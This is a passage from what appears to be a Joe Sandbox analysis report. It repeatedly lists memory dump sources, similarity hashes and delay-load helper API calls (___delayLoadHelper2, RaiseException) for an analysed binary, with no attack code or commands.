                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 24377941d3d633ab0f87b161b7a3697adb0b46ca7eeaf10a46f378bb72b396e9
                    • Instruction ID: 181951dfe3411f9d45af792406ea8a1a61417f9c17c599c733e7d740e13aa72c
                    • Opcode Fuzzy Hash: 24377941d3d633ab0f87b161b7a3697adb0b46ca7eeaf10a46f378bb72b396e9
                    • Instruction Fuzzy Hash: 28B012832681037D778491152C4BF3602DCC5C0B10330C1FFF018C1141E4405C851039
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 8e0f6e74facf6963db29187854e84a937ec54c289d3d804e418e4702018acff5
                    • Instruction ID: 4dbcfaf9556f5b7bc8e4490ae419ce940e3f2163906c01d8d1302e3cb161825e
                    • Opcode Fuzzy Hash: 8e0f6e74facf6963db29187854e84a937ec54c289d3d804e418e4702018acff5
                    • Instruction Fuzzy Hash: CBB012A326A1037D378492152C5BF3602DDC5C0B10330C1FFF018C1041E4409C811039
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: ab3d72c6743168d36688d561171ae9957dca5e56c49b92dfe88a739858c67ce3
                    • Instruction ID: 266e8f959d94d9bf570a0944c81391d4c392c50182d112668d3e97ce32ccd7da
                    • Opcode Fuzzy Hash: ab3d72c6743168d36688d561171ae9957dca5e56c49b92dfe88a739858c67ce3
                    • Instruction Fuzzy Hash: 91B012932680037E364491162C4BF3602DCC5C0B10330C0FFF018C5041E4406C411039
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: b7c75e6e00160082855b03a1b6bf57dd42f4344a82b101e3f89cf8aaea53616c
                    • Instruction ID: e25a4b2e5c56349b0808cb05c5b73bb3ec4fe69f8c2cbc7174863152c7b04738
                    • Opcode Fuzzy Hash: b7c75e6e00160082855b03a1b6bf57dd42f4344a82b101e3f89cf8aaea53616c
                    • Instruction Fuzzy Hash: E9B012832680037E361451112C4FE7602DCC5C0B10331C0FFF014D0041F4405C411039
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 956eca64cbf013e0ff5b27165a433450bc3813b0a83c5cbd89588820d7c22dee
                    • Instruction ID: 8b70659f259be49cde263a4a88ad24953eb50fdcfeaeb4d1f8368ad524108377
                    • Opcode Fuzzy Hash: 956eca64cbf013e0ff5b27165a433450bc3813b0a83c5cbd89588820d7c22dee
                    • Instruction Fuzzy Hash: DDB012C72681037D364491152C8BF3702DCC5C0B10334C0FFF018C1041E8405C411139
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: c9366f15019caa8e12ce17ce1c20174622146acf2c7eb4966c83106cf18e7fa7
                    • Instruction ID: e5bfa1caf45f359be8ce0a98e93828037b83f2a67550015c32a4231696b1b331
                    • Opcode Fuzzy Hash: c9366f15019caa8e12ce17ce1c20174622146acf2c7eb4966c83106cf18e7fa7
                    • Instruction Fuzzy Hash: D9B012872682037D3B8491152C8BF3702ECC5C0B10334C1FFF018C1041E8405C815039
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: c47d7cca283a41177bc19d7b0e5f3e71a066b8fcd8986260dd47473e1dcd9495
                    • Instruction ID: efde089decae69eae06feb362cbfe1f94a0e7e0d6e87bdf30ed7232f2d695847
                    • Opcode Fuzzy Hash: c47d7cca283a41177bc19d7b0e5f3e71a066b8fcd8986260dd47473e1dcd9495
                    • Instruction Fuzzy Hash: 7FB012832781037D364491196C4BF3602ECC5C0B10330C1FFF118C1041E4405C41143D
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 5f998f5cb5915d3069adb02874b4e980fa5affe2494ba06d0f1bf1aaacbf2fde
                    • Instruction ID: 67ee0151ff504153a374c06fa4cacce428b8dcf497bb7070fba206e73eaaf307
                    • Opcode Fuzzy Hash: 5f998f5cb5915d3069adb02874b4e980fa5affe2494ba06d0f1bf1aaacbf2fde
                    • Instruction Fuzzy Hash: E2B012872681037D364491152C8BF3B02DCC5C0B10334C0FFF418C1041E8405C411039
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: f7c7a207a3fca82c0ede37cfed51e6afc7dc2723463617f7371c022aeff1e509
                    • Instruction ID: 146eeb93195700c48bf45f6d86cf92c2cf08c266fc122f115317869b3d328ee1
                    • Opcode Fuzzy Hash: f7c7a207a3fca82c0ede37cfed51e6afc7dc2723463617f7371c022aeff1e509
                    • Instruction Fuzzy Hash: EEB012832684037D3644911A6D4BF3602ECC5C0B10330C2FFF118C5041E4805C42103D
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F33D
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 1a47064e826b7e4e8200384a34f4c606c04a0678f9e55ef8c685368ade07bdaa
                    • Instruction ID: f3f37d16d1e76fc057b0cab427d67545c9bb0a161a5be2c85384845e5f2882d2
                    • Opcode Fuzzy Hash: 1a47064e826b7e4e8200384a34f4c606c04a0678f9e55ef8c685368ade07bdaa
                    • Instruction Fuzzy Hash: 6AB012E32680037D364491162D4BF3602DCC5C0B11330C0FFF018C5041E4805C421039
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F556
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: f6875953755eafd49d0e868993331bf0aa969961a7cbd6b8ab1f3fe011af7604
                    • Instruction ID: 52b05428f2699368cfd706976d54cf8624db352930e22e1a45c5db54128d203a
                    • Opcode Fuzzy Hash: f6875953755eafd49d0e868993331bf0aa969961a7cbd6b8ab1f3fe011af7604
                    • Instruction Fuzzy Hash: CDB012C32B80027F33045215BC57F3601CCC1C4B50330C2FFF018C1051D4409C40003A
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F556
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 91e98db9a6a35cf3b8f475545ad67120e5d96bf498e6c2cd56da8373c0909038
                    • Instruction ID: 3b0518ec881a731a1244b2f5b2bb485f97c40655e6401fcd987ce0899f79ce8b
                    • Opcode Fuzzy Hash: 91e98db9a6a35cf3b8f475545ad67120e5d96bf498e6c2cd56da8373c0909038
                    • Instruction Fuzzy Hash: 39B012C32A82027F370452157C87E3601DCC5C4B10330C1FEF418C1051D8409C840036
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F556
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: bb32ffe575eb6ec18acf3b5da76741b6bbe808bd10559939a39052c0d1aa5e1d
                    • Instruction ID: ff8329750301e65d962ddb431fa5ed68968039d2c0dc0bfb099f415fa389314d
                    • Opcode Fuzzy Hash: bb32ffe575eb6ec18acf3b5da76741b6bbe808bd10559939a39052c0d1aa5e1d
                    • Instruction Fuzzy Hash: 43B012C32E81027F330452157C97F3601CCC1C4B10330C0FEF418C1051D8409C400136
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F6AB
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: f89a953bc22949c6e67c7d3f5ea73123ecbf3df38cafa6d907d97893f3ca4fb4
                    • Instruction ID: f859bdc5213cd037c2b1877d6ebd873ab9de86e951e4525548c75fb30919b9cc
                    • Opcode Fuzzy Hash: f89a953bc22949c6e67c7d3f5ea73123ecbf3df38cafa6d907d97893f3ca4fb4
                    • Instruction Fuzzy Hash: 85B0128327C1027D330451252C47E3601CCC4C4B10330C1FEF028C0191D8419C881135
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F6AB
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: 57b9a7eb705c3db8436c82ce1dcc9d592642574d53a3349770411b9c54a82f66
                    • Instruction ID: 1b8a646f21f998d8e0e9d998c43b725fc71034c2b0b8e38bfe1365f1bc1263f8
                    • Opcode Fuzzy Hash: 57b9a7eb705c3db8436c82ce1dcc9d592642574d53a3349770411b9c54a82f66
                    • Instruction Fuzzy Hash: 74B0128327C0027D320451252D47E3601CCC0C4B10330C0FEF128C4091D8419C451135
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F6AB
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID:
                    • API String ID: 1269201914-0
                    • Opcode ID: a80dd59c66437260970f6ddcd0f3a53f60b7b6f18ff68b0d63cc47a6e4a0b8c1
                    • Instruction ID: 068195ace9b32d7bdc5d87d990e6c7d7e518c64e3f9e7933597698cc98fdd441
                    • Opcode Fuzzy Hash: a80dd59c66437260970f6ddcd0f3a53f60b7b6f18ff68b0d63cc47a6e4a0b8c1
                    • Instruction Fuzzy Hash: 10B0128737D0027D32041111BD47D3601CCC8C0B10330C0FEF114D409298419C411139
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7F6AB
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
